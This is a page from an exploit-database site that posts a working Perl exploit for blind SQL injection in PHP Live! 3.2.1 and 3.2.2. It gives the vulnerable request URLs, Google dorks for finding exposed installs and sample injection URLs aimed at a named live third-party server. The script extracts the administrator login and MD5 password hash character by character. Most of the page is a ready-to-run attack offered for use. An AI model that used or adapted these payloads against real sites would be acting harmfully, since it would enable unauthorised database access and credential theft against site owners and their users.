0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Exploit
[========================================================
PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Exploit
========================================================
#!/usr/bin/perl
#################################################################
#################################################################
################ Original discover author banner ################
#################################################################
#################################################################
# PhpLive 3.2.1/2 (x) Blind SQL injection [_][-][X]
# _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___
# | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \
# | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /
# |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/
#
#
# Red n'black i dress eagle on my chest.
# It's good to be an ALBANIAN Keep my head up high for that flag i die.
# Im proud to be an ALBANIAN
# ###################################################################
# Author : boom3rang
#
# R.I.P redc00de
# -------------------------------------------------------------------
#
# Affected software description
# Software : PhpLive
# Vendor : http://www.phplivesupport.com
# Price : Live Support Download Starts at $89.95
# Version Vuln. : v3.2.1 & v3.2.2
# -------------------------------------------------------------------
#
# [~] SQLi :
#
# http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]
# http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]
#
#
# [~]Google Dork :
#
# Powered by PHP Live! v3.2.1
# Powered by PHP Live! v3.2.2
# allinurl:"request.php" "deptid"
#
# -------------------------------------------------------------------
#
# [~] Table_NAME = chat_admin
# [~] Column_NAME = login - password - email - userID - name
# -------------------------------------------------------------------
#
# [~] Admin Path :
#
# http://www.TARGET.com/phplive
# -------------------------------------------------------------------
# [~] Live Demo:
#
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1 --> True
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2 --> False
#
# -------------------------------------------------------------------
#
# [~] ASCII
#
# /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100
#
# -------------------------------------------------------------------
#
# [~] Live Demo ASCII
#
# True
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48
#
# False
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127
#
###########################
###########################
# Modified version banner #
###########################
###########################
# Author: skys
# Contact: skysbsb[at]gmail.com
# This script uses the PhpLive Blind Sql Injection (found by boom3rang) to recover first user login and MD5 password!
# The result of this script is like:
# admin:890f37d479270aea39ae0e156bbd9001
####################
# EDIT THESE LINES #
####################
# Edit this address acording to the php live path
$address = "http://www.site.com/phplive";
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
@site = ($address."/request.php?l=agenciawiv&x=1/**/and/**/ascii%28substring%28%28select/**/concat%28login,0x3a,password%29/**/from/**/chat_admin/**/limit/**/1,1%29,", ",1%29%29=");
$base64str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$tudo = "";
$foundcolon = 0;
for($i=1;$i<=100;$i++) {
$found = 0;
if($foundcolon == 0) {
for($x=32;$x<=127;$x++) {
$url = $site[0].$i.$site[1].$x;
print "Testing pass index $i: character ".chr($x)."($x)\n";
$resp = query($url);
if($resp =~ m/deptid/i) {
print "Found i($i): ".chr($x)."($x)\n";
$tudo .= chr($x);
print "All: $tudo\n";
$found = 1;
if($x == 0x3a) {
$foundcolon = 1;
}
last;
}
}
} else {
for($x=0;$x<length($base64str);$x++) {
$url = $site[0].$i.$site[1].ord(substr($base64str, $x, 1));
print "Testing pass index $i: character ".ord(substr($base64str, $x, 1))."(".substr($base64str, $x, 1).")\n";
$resp = query($url);
if($resp =~ m/deptid/i) {
print "Found i($i): ".substr($base64str, $x, 1)."(".ord(substr($base64str, $x, 1)).")\n";
$tudo .= substr($base64str, $x, 1);
print "All: $tudo\n";
$found = 1;
last;
}
}
}
if($found == 0) {
print "Not found char index $i! End of md5 hash? :-)\n";
last;
}
}
print "login:md5: $tudo\n";
exit;
sub query() {
$link = $_[0];
my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;
}
# 0day.today [2024-11-16] #